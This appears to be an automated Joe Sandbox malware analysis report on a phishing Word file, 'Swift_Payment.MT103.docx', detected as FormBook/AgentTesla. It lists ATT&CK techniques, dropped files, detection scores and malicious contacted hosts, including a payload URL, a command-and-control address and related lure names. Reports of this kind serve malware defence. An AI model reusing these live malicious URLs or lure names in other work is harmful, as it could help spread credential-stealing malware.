Source: Yara match	File source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery321	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading111	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information11	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Swift_Payment.MT103.docx	8%	Virustotal		Browse
Swift_Payment.MT103.docx	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\o[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27720357.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe	26%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\Public\vbc.exe	26%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.2.vbc.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
6.0.vbc.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
xy2.eu	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://xy2.eu/?redirect=e9yj	0%	Avira URL Cloud	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://192.3.141.164/oti/	0%	Avira URL Cloud	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.loundxgroup.com/nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA==	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://xy2.eu/e9yj	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.loundxgroup.com	91.227.139.235	true	true		unknown
grandcanyonbean.com	34.102.136.180	true	false		unknown
xy2.eu	93.157.97.6	true	true	5%, Virustotal, Browse	unknown
www.grandcanyonbean.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://xy2.eu/?redirect=e9yj	true	Avira URL Cloud: safe	unknown
http://www.loundxgroup.com/nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA==	true	Avira URL Cloud: safe	unknown
http://xy2.eu/e9yj	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.msn.com/de-de/?ocid=iehpi	explorer.exe, 00000007.00000000.2205990813.000000000842E000.00000004.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	explorer.exe, 00000007.00000000.2205909472.000000000839A000.00000004.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000007.00000000.2196107668.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000005.00000002.2184986711.0000000002231000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	explorer.exe, 00000007.00000000.2206376582.000000000856E000.00000004.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://192.3.141.164/oti/	oti on 192.3.141.164.url.0.dr	false	Avira URL Cloud: safe	unknown
http://www.amazon.de/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000007.00000000.2205909472.000000000839A000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.sify.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1y	explorer.exe, 00000007.00000000.2206728525.000000000861C000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
91.227.139.235	www.loundxgroup.com	Hungary	20845	DIGICABLEHU	true
34.102.136.180	grandcanyonbean.com	United States	15169	GOOGLEUS	false
192.3.141.164	unknown	United States	36352	AS-COLOCROSSINGUS	false
93.157.97.6	xy2.eu	Poland	34360	OGICOMPL	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	433305
Start date:	11.06.2021
Start time:	15:57:53
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Swift_Payment.MT103.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOCX@9/23@13/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 23.8% (good quality ratio 21.6%) Quality average: 73.2% Quality standard deviation: 32%
HCA Information:	Successful, ratio: 98% Number of executed functions: 165 Number of non-executed functions: 68
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .docx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:59:20	API Interceptor	58x Sleep call for process: EQNEDT32.EXE modified
15:59:23	API Interceptor	58x Sleep call for process: vbc.exe modified
15:59:45	API Interceptor	116x Sleep call for process: NAPSTAT.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
93.157.97.6	Next RFQ 3005590.xlsx	Get hash	malicious	Browse	tinyurl.mobi/?redirect=bw4A
	remittance-cable-from-the-bank.docx	Get hash	malicious	Browse	hoo.gl/http://hoo.gl/gfx/paypal.png
	remittance-cable-from-the-bank.docx	Get hash	malicious	Browse	tinyurl.mobi/
	Revised-RBG-180129940.xlsx	Get hash	malicious	Browse	hoo.gl/?redirect=btqF
	New Year Inquiry List.xlsx	Get hash	malicious	Browse	hoo.gl/?redirect=bsbe
	Payment_doc.docx	Get hash	malicious	Browse	bitly.ws/?redirect=bpNT
